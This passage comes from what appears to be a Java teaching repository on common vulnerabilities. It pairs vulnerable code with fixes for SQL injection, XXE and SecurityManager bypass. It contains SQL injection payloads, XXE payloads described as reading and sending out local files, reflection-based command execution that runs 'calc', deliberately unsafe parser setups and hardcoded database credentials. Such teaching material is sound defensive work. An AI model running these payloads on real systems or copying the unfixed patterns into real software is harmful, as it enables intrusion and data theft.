query = session.createQuery("from User where name = :name", User.class);
29 | query.setParameter("name",name);
30 | User user = query.getSingleResult();
31 | System.out.println(user.getId() + "-" + user.getName() + "-" + user.getDate());
32 | session.close();
33 | }
34 | }
35 |
--------------------------------------------------------------------------------
/owasp/src/main/java/com/r17a/commonvuln/injection/sqli/hibernate/pojo/User.hbm.xml:
--------------------------------------------------------------------------------
1 |
2 |
5 |
6 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
22 |
23 |
24 |
25 |
26 |
--------------------------------------------------------------------------------
/owasp/src/main/java/com/r17a/commonvuln/injection/sqli/hibernate/pojo/User.java:
--------------------------------------------------------------------------------
1 | package com.r17a.commonvuln.injection.sqli.hibernate.pojo;
2 |
3 | public class User {
4 | private String id;
5 | private String name;
6 | private String password;
7 | private String date;
8 |
9 | public User(){
10 | }
11 |
12 | public String getId() {
13 | return id;
14 | }
15 |
16 | public void setId(String id) {
17 | this.id = id;
18 | }
19 |
20 | public String getName() {
21 | return name;
22 | }
23 |
24 | public void setName(String name) {
25 | this.name = name;
26 | }
27 |
28 | public String getPassword() {
29 | return password;
30 | }
31 |
32 | public void setPassword(String password) {
33 | this.password = password;
34 | }
35 |
36 | public String getDate() {
37 | return date;
38 | }
39 |
40 | public void setDate(String date) {
41 | this.date = date;
42 | }
43 | }
44 |
45 |
--------------------------------------------------------------------------------
/owasp/src/main/java/com/r17a/commonvuln/injection/sqli/hibernate/utils/HibernateUtils.java:
--------------------------------------------------------------------------------
1 | package com.r17a.commonvuln.injection.sqli.hibernate.utils;
2 |
3 |
4 | import org.hibernate.HibernateException;
5 | import org.hibernate.Session;
6 | import org.hibernate.SessionFactory;
7 | import org.hibernate.boot.registry.StandardServiceRegistryBuilder;
8 | import org.hibernate.cfg.Configuration;
9 | import org.hibernate.service.ServiceRegistry;
10 |
11 | import com.r17a.commonvuln.injection.sqli.hibernate.pojo.User;
12 |
13 |
14 | public class HibernateUtils {
15 |
16 | private static SessionFactory factory;
17 | private static ServiceRegistry serviceRegistry;
18 | static{
19 | try{
20 | Configuration configuration = new Configuration().configure();
21 |
22 | configuration.addClass(User.class);
23 |
24 | serviceRegistry = new StandardServiceRegistryBuilder()
25 | .applySettings(configuration.getProperties()).build();
26 | factory = configuration.buildSessionFactory(serviceRegistry);
27 | }catch(HibernateException e){
28 | e.printStackTrace();
29 | }
30 | }
31 | //返回会话工厂对象
32 | public static SessionFactory getSessionFactory(){
33 | return factory;
34 | }
35 | //返回一个会话对象
36 | public static Session getSession(){
37 | Session session = null;
38 | if(factory!=null) {
39 | session = factory.openSession();
40 | }
41 | return session;
42 | }
43 | //关闭指定的会话对象
44 | public static void closeSession(Session session){
45 | if(session!=null){
46 | if(session.isOpen()) {
47 | session.close();
48 | }
49 | }
50 | }
51 | }
52 |
--------------------------------------------------------------------------------
/owasp/src/main/java/com/r17a/commonvuln/injection/sqli/jdbc/JdbcSqli.java:
--------------------------------------------------------------------------------
1 | package com.r17a.commonvuln.injection.sqli.jdbc;
2 |
3 | import java.sql.*;
4 |
5 | /**
6 | * TODO 设置用户名密码和Mysql地址
7 | * */
8 | public class JdbcSqli {
9 | public static void main(String[] args) throws Exception {
10 | JdbcSqli jdbcSqli = new JdbcSqli();
11 | jdbcSqli.selectPoc("1 and 1=2 union select * from user");
12 | jdbcSqli.selectFix("2' and 1=2 union select * from user where '1'='1");
13 | }
14 |
15 | public void selectPoc(String value) throws Exception {
16 | final String url = "jdbc:mysql://localhost:3306/users?useUnicode=true&characterEncoding=UTF-8&useSSL=true";
17 | final String username = "root";
18 | final String password = "1qazXSW@3edc";
19 |
20 | // 加载驱动
21 | Class.forName("com.mysql.cj.jdbc.Driver");
22 | // 连接数据库
23 | Connection connection = DriverManager.getConnection(url, username, password);
24 | //创建Statement,编写sql语句
25 | Statement statement = connection.createStatement();
26 | String sql = "select * from user where id=" + value;
27 | ResultSet resultSet = statement.executeQuery(sql);
28 | while (resultSet.next()) {
29 | System.out.println("id:" + resultSet.getObject("id"));
30 | System.out.println("name:" + resultSet.getObject("name"));
31 | System.out.println("password:" + resultSet.getObject("password"));
32 | System.out.println("date:" + resultSet.getObject("date"));
33 | }
34 |
35 | resultSet.close();
36 | statement.close();
37 | connection.close();
38 | }
39 |
40 | public void selectFix(String value) throws Exception {
41 | final String url = "jdbc:mysql://localhost:3306/users?useUnicode=true&characterEncoding=UTF-8";
42 | final String username = "root";
43 | final String password = "1qazXSW@3edc";
44 |
45 | // 加载驱动
46 | Class.forName("com.mysql.cj.jdbc.Driver");
47 | // 连接数据库
48 | Connection connection = DriverManager.getConnection(url, username, password);
49 | //创建Statement,编写sql语句
50 | String sql = "select * from user where id=?";
51 | PreparedStatement preparedStatement = connection.prepareStatement(sql);
52 | preparedStatement.setString(1,value);
53 | ResultSet resultSet = preparedStatement.executeQuery();
54 | while (resultSet.next()) {
55 | System.out.println("id:" + resultSet.getObject("id"));
56 | System.out.println("name:" + resultSet.getObject("name"));
57 | System.out.println("password:" + resultSet.getObject("password"));
58 | System.out.println("date:" + resultSet.getObject("date"));
59 | }
60 | preparedStatement.close();
61 | connection.close();
62 | }
63 | }
64 |
--------------------------------------------------------------------------------
/owasp/src/main/java/com/r17a/commonvuln/injection/sqli/mybatis/dao/UserMapper.java:
--------------------------------------------------------------------------------
1 | package com.r17a.commonvuln.injection.sqli.mybatis.dao;
2 |
3 | import com.r17a.commonvuln.injection.sqli.mybatis.pojo.User;
4 |
5 | public interface UserMapper {
6 | User getById(String id);
7 |
8 | User getByIdPrepare(String id);
9 | }
10 |
--------------------------------------------------------------------------------
/owasp/src/main/java/com/r17a/commonvuln/injection/sqli/mybatis/dao/UserMapper.xml:
--------------------------------------------------------------------------------
1 |
2 |
5 |
6 |
7 |
10 |
13 |
16 |
19 |
22 |
23 |
24 |
25 |
28 |
34 |
37 |
49 |
--------------------------------------------------------------------------------
/owasp/src/main/java/com/r17a/commonvuln/injection/sqli/mybatis/pojo/User.java:
--------------------------------------------------------------------------------
1 | package com.r17a.commonvuln.injection.sqli.mybatis.pojo;
2 |
3 | public class User {
4 | private String id;
5 | private String name;
6 | private String password;
7 | private String date;
8 |
9 | public User(){
10 | }
11 |
12 | public String getId() {
13 | return id;
14 | }
15 |
16 | public void setId(String id) {
17 | this.id = id;
18 | }
19 |
20 | public String getName() {
21 | return name;
22 | }
23 |
24 | public void setName(String name) {
25 | this.name = name;
26 | }
27 |
28 | public String getPassword() {
29 | return password;
30 | }
31 |
32 | public void setPassword(String password) {
33 | this.password = password;
34 | }
35 |
36 | public String getDate() {
37 | return date;
38 | }
39 |
40 | public void setDate(String date) {
41 | this.date = date;
42 | }
43 | }
44 |
45 |
--------------------------------------------------------------------------------
/owasp/src/main/java/com/r17a/commonvuln/injection/sqli/mybatis/utils/MybatisUtils.java:
--------------------------------------------------------------------------------
1 | package com.r17a.commonvuln.injection.sqli.mybatis.utils;
2 |
3 | import org.apache.ibatis.io.Resources;
4 | import org.apache.ibatis.session.SqlSession;
5 | import org.apache.ibatis.session.SqlSessionFactory;
6 | import org.apache.ibatis.session.SqlSessionFactoryBuilder;
7 |
8 | import java.io.IOException;
9 | import java.io.InputStream;
10 |
11 | public class MybatisUtils {
12 | private static SqlSessionFactory sqlSessionFactory;
13 |
14 | static {
15 | try {
16 | String resource = "mybatis-config.xml";
17 | InputStream inputStream = Resources.getResourceAsStream(resource);
18 | sqlSessionFactory = new SqlSessionFactoryBuilder().build(inputStream);
19 | } catch (IOException e) {
20 | e.printStackTrace();
21 | }
22 |
23 | }
24 |
25 | public static SqlSession getSqlSession() {
26 | SqlSession sqlSession = sqlSessionFactory.openSession();
27 | return sqlSession;
28 | }
29 |
30 | }
31 |
--------------------------------------------------------------------------------
/owasp/src/main/java/com/r17a/commonvuln/securitymissconfig/securitymanager/BypassByReflection.java:
--------------------------------------------------------------------------------
1 | package com.r17a.commonvuln.securitymissconfig.securitymanager;
2 |
3 | import java.lang.reflect.Method;
4 | import java.util.Map;
5 |
6 | public class BypassByReflection {
7 | public static void main(String[] args) {
8 |
9 | //TODO compile and run with: -Djava.security.manager -Djava.security.policy==bypass-by-reflection.policy
10 | // bypass-by-reflection.policy:
11 | // grant {
12 | // permission java.lang.reflect.ReflectPermission "suppressAccessChecks";
13 | // permission java.lang.RuntimePermission "accessDeclaredMembers";
14 | // };
15 |
16 | // executeCommandWithReflection("calc");
17 | exec("calc");
18 | }
19 |
20 | public static void exec(String command) {
21 | try {
22 | Runtime.getRuntime().exec(command);
23 | } catch (Exception e) {
24 | e.printStackTrace();
25 | }
26 | }
27 |
28 | public static void executeCommandWithReflection(String command) {
29 | try {
30 | Class clz = Class.forName("java.lang.ProcessImpl");
31 | Method method = clz.getDeclaredMethod("start", String[].class, Map.class, String.class, ProcessBuilder.Redirect[].class, boolean.class);
32 | method.setAccessible(true);
33 | method.invoke(clz, new String[]{command}, null, null, null, false);
34 | } catch (Exception e) {
35 | e.printStackTrace();
36 | }
37 | }
38 |
39 | }
--------------------------------------------------------------------------------
/owasp/src/main/java/com/r17a/commonvuln/securitymissconfig/securitymanager/SetSecurityManagerNullBypass.java:
--------------------------------------------------------------------------------
1 | package com.r17a.commonvuln.securitymissconfig.securitymanager;
2 |
3 |
4 | import java.io.IOException;
5 |
6 | /**
7 | * 通过授权RuntimePermission为setSecurityManager和设置SecurityManager为null,绕过check
8 | */
9 | public class SetSecurityManagerNullBypass {
10 | public static void main(String[] args) {
11 | new SetSecurityManagerNullBypass().exec();
12 | }
13 |
14 | private void exec() {
15 | //TODO 编译运行 -Djava.security.manager -Djava.security.policy==your.policy
16 | // grant {
17 | // permission java.lang.RuntimePermission "setSecurityManager";
18 | // };
19 |
20 | // 设置SecurityManager为null 绕过check
21 | System.setSecurityManager(null);
22 | // 执行命令
23 | Runtime runtime = Runtime.getRuntime();
24 | try {
25 | runtime.exec("calc");
26 | } catch (IOException e) {
27 | e.printStackTrace();
28 | }
29 | }
30 |
31 | }
32 |
--------------------------------------------------------------------------------
/owasp/src/main/java/com/r17a/commonvuln/securitymissconfig/securitymanager/policy/CreatePolicy.java:
--------------------------------------------------------------------------------
1 | package com.r17a.commonvuln.securitymissconfig.securitymanager.policy;
2 |
3 | import java.io.*;
4 |
5 | public class CreatePolicy {
6 | public static void main(String[] args) {
7 | CreatePolicy createPolicy = new CreatePolicy();
8 | createPolicy.createFilePermission("E:/myTest.policy", "E:\\test.txt");
9 | }
10 |
11 | /**
12 | * 在指定文件下生成一个policy文件,允许某个文件的读写
13 | *
14 | * @param policyFileName 指定配置文件保存位置
15 | * @param allowFileName 指定可读写文件
16 | */
17 | public void createFilePermission(String policyFileName, String allowFileName) {
18 | allowFileName = allowFileName.replace("\\", "/");
19 | String policyContent = "grant {\n" +
20 | " permission java.io.FilePermission \"" + allowFileName + "\",\"read,write\";\n" +
21 | "};";
22 | try {
23 | FileWriter fileWriter = new FileWriter(policyFileName);
24 | fileWriter.write(policyContent);
25 | fileWriter.flush();
26 | fileWriter.close();
27 | } catch (IOException e) {
28 | e.printStackTrace();
29 | }
30 | }
31 |
32 | /**
33 | * 根据授权内容在指定文件下生成一个policy文件
34 | *
35 | * @param permission 指定授权内容
36 | * @param policyFileName 指定配置文件保存位置
37 | */
38 | public void createAnyPermission(String permission, String policyFileName){
39 | String policyContent = "grant {\n " + permission +"\n" +"\n};";
40 | try {
41 | FileWriter fileWriter = new FileWriter(policyFileName);
42 | fileWriter.write(permission);
43 | fileWriter.flush();
44 | fileWriter.close();
45 | } catch (IOException e) {
46 | e.printStackTrace();
47 | }
48 | }
49 |
50 | }
51 |
--------------------------------------------------------------------------------
/owasp/src/main/java/com/r17a/commonvuln/securitymissconfig/xxe/DocumentBuilderXXE.java:
--------------------------------------------------------------------------------
1 | package com.r17a.commonvuln.securitymissconfig.xxe;
2 |
3 | import org.w3c.dom.Document;
4 |
5 | import javax.xml.XMLConstants;
6 | import javax.xml.parsers.DocumentBuilder;
7 | import javax.xml.parsers.DocumentBuilderFactory;
8 | import java.io.ByteArrayInputStream;
9 |
10 | public class DocumentBuilderXXE extends XXE{
11 |
12 | public static void main(String[] args) {
13 | new DocumentBuilderXXE().test();
14 | }
15 |
16 |
17 | void readNoFixXxe() {
18 | try {
19 | DocumentBuilderFactory documentBuilderFactory = DocumentBuilderFactory.newInstance();
20 | DocumentBuilder documentBuilder = documentBuilderFactory.newDocumentBuilder();
21 | ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(Payloads.FEEDBACK.getBytes());
22 | Document d = documentBuilder.parse(byteArrayInputStream);
23 | System.out.println(d.getDocumentElement().getTextContent());
24 | } catch (Exception e) {
25 | e.printStackTrace();
26 | }
27 |
28 | }
29 |
30 | void readWithFixXxe() {
31 | try {
32 | DocumentBuilderFactory documentBuilderFactory = DocumentBuilderFactory.newInstance();
33 | documentBuilderFactory.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
34 | documentBuilderFactory.setAttribute(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
35 | documentBuilderFactory.setAttribute(XMLConstants.FEATURE_SECURE_PROCESSING, true);
36 | DocumentBuilder documentBuilder = documentBuilderFactory.newDocumentBuilder();
37 | ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(Payloads.FEEDBACK.getBytes());
38 | Document d = documentBuilder.parse(byteArrayInputStream);
39 | System.out.println(d.getDocumentElement().getTextContent());
40 | } catch (Exception e) {
41 | e.printStackTrace();
42 | }
43 |
44 | }
45 |
46 | }
47 |
--------------------------------------------------------------------------------
/owasp/src/main/java/com/r17a/commonvuln/securitymissconfig/xxe/Payloads.java:
--------------------------------------------------------------------------------
1 | package com.r17a.commonvuln.securitymissconfig.xxe;
2 |
3 | /**
4 | * from https://github.com/threedr3am/learnjavabug/tree/master/xxe/src/main/java/com/threedr3am/bug/xxe
5 | */
6 | public interface Payloads {
7 |
8 | /**
9 | * 有回显的payload xml
10 | *
11 | * 读取文件内容
12 | */
13 | String FEEDBACK =
14 | ""
15 | + ""
17 | + " ]>"
18 | + "&xxe;";
19 |
20 | /**
21 | * 有回显的payload xml,带了xsl
22 | *
23 | * 读取文件内容
24 | */
25 | String FEEDBACK_XSL =
26 | "\n" +
27 | "\n" +
29 | "]>\n" +
30 | "\n" +
31 | "\n" +
32 | " &file;\n" +
33 | "";
34 |
35 | /**
36 | * 没有回显,只能带出去的payload xml,读取文件单行
37 | *
38 | * 读取/tmp/aaa文件内容
39 | * 127.0.0.1:80的http web服务器存放xxe.dtd文件:
40 | * ">
41 | * 监听23232端口
42 | */
43 | String NO_FEEDBACK_SINGLE_LINE =
44 | ""
45 | + ""
47 | + " "
48 | + " %remote;%all;"
49 | + "]>"
50 | + "&send;";
51 |
52 | /**
53 | * 没有回显,只能带出去的payload xml,读取文件多行
54 | *
55 | * 读取/tmp/aaa文件内容
56 | * 127.0.0.1:80的http web服务器存放xxe.dtd文件:
57 | * ">
58 | * 监听23232端口
59 | */
60 | String NO_FEEDBACK_MULT_LINE =
61 | ""
62 | + ""
64 | + " "
65 | + " %remote;%all;"
66 | + "]>"
67 | + "&send;";
68 | }
69 |
--------------------------------------------------------------------------------
/owasp/src/main/java/com/r17a/commonvuln/securitymissconfig/xxe/SAXBuilderXXE.java:
--------------------------------------------------------------------------------
1 | package com.r17a.commonvuln.securitymissconfig.xxe;
2 |
3 | import java.io.ByteArrayInputStream;
4 | import java.util.List;
5 |
6 | import org.jdom.Content;
7 | import org.jdom.Document;
8 | import org.jdom.Element;
9 | import org.jdom.input.SAXBuilder;
10 |
11 | public class SAXBuilderXXE extends XXE {
12 | public static void main(String[] args) {
13 | new SAXBuilderXXE().test();
14 | }
15 |
16 | void readNoFixXxe() {
17 | try {
18 | ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(Payloads.FEEDBACK.getBytes());
19 | SAXBuilder saxBuilder = new SAXBuilder();
20 | Document document = saxBuilder.build(byteArrayInputStream);
21 | Element element = document.getRootElement();
22 | List contents = element.getContent();
23 | for (Content content : contents) {
24 | System.out.println(content.getValue());
25 | }
26 | } catch (Exception e) {
27 | e.printStackTrace();
28 | }
29 |
30 | }
31 |
32 | void readWithFixXxe() {
33 | try {
34 | ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(Payloads.FEEDBACK.getBytes());
35 | SAXBuilder saxBuilder = new SAXBuilder();
36 | saxBuilder.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
37 | saxBuilder.setFeature("http://xml.org/sax/features/external-general-entities", false);
38 | saxBuilder.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
39 | saxBuilder.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
40 | Document document = saxBuilder.build(byteArrayInputStream);
41 | Element element = document.getRootElement();
42 | List contents = element.getContent();
43 | for (Content content : contents) {
44 | System.out.println(content.getValue());
45 | }
46 | } catch (Exception e) {
47 | e.printStackTrace();
48 | }
49 |
50 | }
51 | }
52 |
--------------------------------------------------------------------------------
/owasp/src/main/java/com/r17a/commonvuln/securitymissconfig/xxe/SAXReadXXE.java:
--------------------------------------------------------------------------------
1 | package com.r17a.commonvuln.securitymissconfig.xxe;
2 |
3 | import org.dom4j.Document;
4 | import org.dom4j.io.SAXReader;
5 | import org.dom4j.io.XMLWriter;
6 |
7 | import java.io.ByteArrayInputStream;
8 |
9 | public class SAXReadXXE extends XXE {
10 | public static void main(String[] args) {
11 | new SAXReadXXE().test();
12 | }
13 |
14 | @Override
15 | void readNoFixXxe() {
16 | try {
17 | ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(Payloads.FEEDBACK.getBytes());
18 | SAXReader saxReader = new SAXReader();
19 | Document doc = saxReader.read(byteArrayInputStream);
20 | XMLWriter xmlWriter = new XMLWriter(System.out);
21 | xmlWriter.write(doc);
22 | } catch (Exception e) {
23 | e.printStackTrace();
24 | }
25 | }
26 |
27 | @Override
28 | void readWithFixXxe() {
29 | try {
30 | ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(Payloads.FEEDBACK.getBytes());
31 | SAXReader saxReader = new SAXReader();
32 | saxReader.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
33 | saxReader.setFeature("http://xml.org/sax/features/external-general-entities", false);
34 | saxReader.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
35 | saxReader.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
36 | Document doc = saxReader.read(byteArrayInputStream);
37 | XMLWriter xmlWriter = new XMLWriter(System.out);
38 | xmlWriter.write(doc);
39 | } catch (Exception e) {
40 | e.printStackTrace();
41 | }
42 | }
43 | }
44 |
--------------------------------------------------------------------------------
/owasp/src/main/java/com/r17a/commonvuln/securitymissconfig/xxe/SAXTransformerFactoryXXE.java:
--------------------------------------------------------------------------------
1 | package com.r17a.commonvuln.securitymissconfig.xxe;
2 |
3 |
4 | import javax.xml.XMLConstants;
5 | import javax.xml.transform.Result;
6 | import javax.xml.transform.sax.SAXTransformerFactory;
7 | import javax.xml.transform.sax.TransformerHandler;
8 | import javax.xml.transform.stream.StreamResult;
9 | import javax.xml.transform.stream.StreamSource;
10 | import java.io.ByteArrayInputStream;
11 |
12 | public class SAXTransformerFactoryXXE extends XXE {
13 | public static void main(String[] args) {
14 | new SAXTransformerFactoryXXE().test();
15 | }
16 |
17 | @Override
18 | void readNoFixXxe() {
19 | try {
20 | ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(Payloads.NO_FEEDBACK_SINGLE_LINE.getBytes());
21 | SAXTransformerFactory sf = (SAXTransformerFactory) SAXTransformerFactory.newInstance();
22 | StreamSource source = new StreamSource(byteArrayInputStream);
23 | TransformerHandler transformerHandler = sf.newTransformerHandler(source);
24 | // 创建Result对象,并通过transformerHandler将目的流与其关联
25 | Result result = new StreamResult(System.out);
26 | transformerHandler.setResult(result);
27 | } catch (Exception e) {
28 | e.printStackTrace();
29 | }
30 | }
31 |
32 | @Override
33 | void readWithFixXxe() {
34 | try {
35 | ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(Payloads.FEEDBACK_XSL.getBytes());
36 | SAXTransformerFactory sf = (SAXTransformerFactory) SAXTransformerFactory.newInstance();
37 | sf.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
38 | sf.setAttribute(XMLConstants.ACCESS_EXTERNAL_STYLESHEET, "");
39 | StreamSource source = new StreamSource(byteArrayInputStream);
40 | TransformerHandler transformerHandler = sf.newTransformerHandler(source);
41 | // 创建Result对象,并通过transformerHandler将目的流与其关联
42 | Result result = new StreamResult(System.out);
43 | transformerHandler.setResult(result);
44 | } catch (Exception e) {
45 | e.printStackTrace();
46 | }
47 | }
48 | }
49 |
--------------------------------------------------------------------------------
/owasp/src/main/java/com/r17a/commonvuln/securitymissconfig/xxe/TransformerFactoryXXE.java:
--------------------------------------------------------------------------------
1 | package com.r17a.commonvuln.securitymissconfig.xxe;
2 |
3 | import javax.xml.XMLConstants;
4 | import javax.xml.transform.TransformerException;
5 | import javax.xml.transform.TransformerFactory;
6 | import javax.xml.transform.stream.StreamResult;
7 | import javax.xml.transform.stream.StreamSource;
8 | import java.io.ByteArrayInputStream;
9 |
10 | public class TransformerFactoryXXE extends XXE {
11 | public static void main(String[] args) {
12 | new TransformerFactoryXXE().test();
13 | }
14 | @Override
15 | void readNoFixXxe() {
16 | try {
17 | ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(Payloads.FEEDBACK.getBytes());
18 | TransformerFactory tf = TransformerFactory.newInstance();
19 | StreamSource source = new StreamSource(byteArrayInputStream);
20 | tf.newTransformer().transform(source, new StreamResult(System.out));
21 | } catch (TransformerException e) {
22 | e.printStackTrace();
23 | }
24 | }
25 |
26 | @Override
27 | void readWithFixXxe() {
28 | try {
29 | ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(Payloads.FEEDBACK.getBytes());
30 | TransformerFactory tf = TransformerFactory.newInstance();
31 | tf.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
32 | tf.setAttribute(XMLConstants.ACCESS_EXTERNAL_STYLESHEET, "");
33 | StreamSource source = new StreamSource(byteArrayInputStream);
34 | tf.newTransformer().transform(source, new StreamResult(System.out));
35 | } catch (TransformerException e) {
36 | e.printStackTrace();
37 | }
38 | }
39 | }
40 |
--------------------------------------------------------------------------------
/owasp/src/main/java/com/r17a/commonvuln/securitymissconfig/xxe/XXE.java:
--------------------------------------------------------------------------------
1 | package com.r17a.commonvuln.securitymissconfig.xxe;
2 |
3 | abstract class XXE {
4 | abstract void readNoFixXxe();
5 | abstract void readWithFixXxe();
6 |
7 | void test(){
8 | System.out.println("\n---------This is result with xxe!-------------");
9 | this.readNoFixXxe();
10 | System.out.println("\n---------This is result fixing xxe patch!-------------");
11 | this.readWithFixXxe();
12 | }
13 | }
14 |
--------------------------------------------------------------------------------
/owasp/src/main/resources/hibernate.cfg.xml:
--------------------------------------------------------------------------------
1 |
2 |
5 |
6 |
7 |
8 |
9 | thread
10 |
11 | com.mysql.cj.jdbc.Driver
12 | jdbc:mysql://localhost:3306/users?serverTimezone=UTC
13 | root
14 | 1qazXSW@3edc
15 |
16 |
17 | true
18 |
19 | true
20 |
21 |
22 | org.hibernate.dialect.MySQLDialect
23 |
24 |
25 |
26 |
27 |
--------------------------------------------------------------------------------
/owasp/src/main/resources/imgs/111.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/src/main/resources/imgs/111.png
--------------------------------------------------------------------------------
/owasp/src/main/resources/mybatis-config.xml:
--------------------------------------------------------------------------------
1 |
2 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
--------------------------------------------------------------------------------
/owasp/src/main/resources/tmp/tmp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/src/main/resources/tmp/tmp
--------------------------------------------------------------------------------
/owasp/src/main/resources/user_db.sql:
--------------------------------------------------------------------------------
1 | create database users;
2 | use users;
3 | create table user
4 | (
5 | id INT(20) NOT NULL,
6 | name VARCHAR(20),
7 | password VARCHAR(20),
8 | date DATE,
9 | PRIMARY KEY (id)
10 | ) engine = innodb
11 | default charset = 'utf8';
12 | insert into user values(1,'zhansan','111','2021-01-01');
13 | insert into user values(2,'lisi','111','2021-01-01');
14 | insert into user values(3,'wangwu','111','2021-01-01');
15 | insert into user values(4,'wangqiang','111','2021-01-01');
--------------------------------------------------------------------------------
/owasp/target/classes/com/r17a/commonvuln/cors/Cors.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/cors/Cors.class
--------------------------------------------------------------------------------
/owasp/target/classes/com/r17a/commonvuln/file/FileDelete.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/file/FileDelete.class
--------------------------------------------------------------------------------
/owasp/target/classes/com/r17a/commonvuln/file/FileUnzip.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/file/FileUnzip.class
--------------------------------------------------------------------------------
/owasp/target/classes/com/r17a/commonvuln/file/FileUploadOrDownload.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/file/FileUploadOrDownload.class
--------------------------------------------------------------------------------
/owasp/target/classes/com/r17a/commonvuln/injection/command/ProcessCmdInject.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/injection/command/ProcessCmdInject.class
--------------------------------------------------------------------------------
/owasp/target/classes/com/r17a/commonvuln/injection/command/RuntimeCmdInject.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/injection/command/RuntimeCmdInject.class
--------------------------------------------------------------------------------
/owasp/target/classes/com/r17a/commonvuln/injection/expression/mvel/MvelTest.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/injection/expression/mvel/MvelTest.class
--------------------------------------------------------------------------------
/owasp/target/classes/com/r17a/commonvuln/injection/expression/ognl/OgnlTest$1.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/injection/expression/ognl/OgnlTest$1.class
--------------------------------------------------------------------------------
/owasp/target/classes/com/r17a/commonvuln/injection/expression/ognl/OgnlTest.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/injection/expression/ognl/OgnlTest.class
--------------------------------------------------------------------------------
/owasp/target/classes/com/r17a/commonvuln/injection/expression/ognl/bean/School.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/injection/expression/ognl/bean/School.class
--------------------------------------------------------------------------------
/owasp/target/classes/com/r17a/commonvuln/injection/expression/ognl/bean/SchoolMaster.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/injection/expression/ognl/bean/SchoolMaster.class
--------------------------------------------------------------------------------
/owasp/target/classes/com/r17a/commonvuln/injection/expression/ognl/bean/Student.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/injection/expression/ognl/bean/Student.class
--------------------------------------------------------------------------------
/owasp/target/classes/com/r17a/commonvuln/injection/expression/spel/SpelTest.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/injection/expression/spel/SpelTest.class
--------------------------------------------------------------------------------
/owasp/target/classes/com/r17a/commonvuln/injection/redirect/UrlRedirect.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/injection/redirect/UrlRedirect.class
--------------------------------------------------------------------------------
/owasp/target/classes/com/r17a/commonvuln/injection/sqli/hibernate/HibernateSqli.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/injection/sqli/hibernate/HibernateSqli.class
--------------------------------------------------------------------------------
